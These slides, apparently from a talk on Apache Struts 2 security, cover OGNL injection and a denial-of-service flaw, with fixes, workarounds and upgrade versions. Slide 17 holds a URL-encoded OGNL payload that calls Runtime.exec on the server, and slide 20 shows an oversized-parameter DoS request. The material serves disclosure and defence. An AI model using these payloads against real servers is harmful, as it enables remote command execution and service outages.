  • 17. ¡  /action?foo= %28%23context[%22xwork.MethodAccessor.deny MethodExecution%22]%3D+new +java.lang.Boolean%28false %29,%20%23_memberAccess[%22allowStaticMeth odAccess%22]%3d+new+java.lang.Boolean%28true %29,%20@java.lang.Runtime@getRuntime %28%29.exec%28%27mkdir%20/tmp/PWNAGE %27%29%29%28meh%29&z[%28foo %29%28%27meh%27%29]=true  
  • 18. ¡  Stronger  pattern  for  parameter  names   §  OGNL  only  sets  value,  does  not  evaluate  it   ¡  Workaround   §  add  a  filter  to  filter  out  all  the  suspicious  looking   parameters/headers   ¡  Upgrade  to  Struts  2.3.1.2  
  • 19. ¡  Denial  of  Service   §  Long  request  parameter  name  is  evaluated  by   OGNL  and  consumes  significant  CPU  cycle   ¡  http://struts.apache.org/2.x/docs/s2-­‐011.html  
  • 20. ¡  POST  /home   veryveryveryevenveryveryveryveryveryveryv eryveryevenevenveryveryveryveryloooooooo ooooooongpramaterename=1   §  300  request   §  parameter  name  length  =  1000000  
  • 21. ¡  Add  parameter  name  length  limit   §  By  default  100  characters   §  User  can  change  the  limit     ¡  Workaround   §  add  a  filter  to  filter  out  all  the  parameters  longer   than  xxx   ¡  Upgrade  to  Struts  2.3.4.1  
  • 22. ¡  Struts  2  allows  nested  OGNL  expressions   §  #  {%{java.lang.System@out.println(“hello”)}}   §  Users  do  not  escape  data   ¡  Example  –  please  judge  
  • 23. ¡  Check  how  vulnerable  your  current  web   framework  is   ¡  Find  a  security  vulnerability,  try  to  inject   JavaScript   §  Report  back  to  the  project  team  
  • 24.     This  is  the  end,  questions?   @lukaszlenart   lukaszlenart@apache.org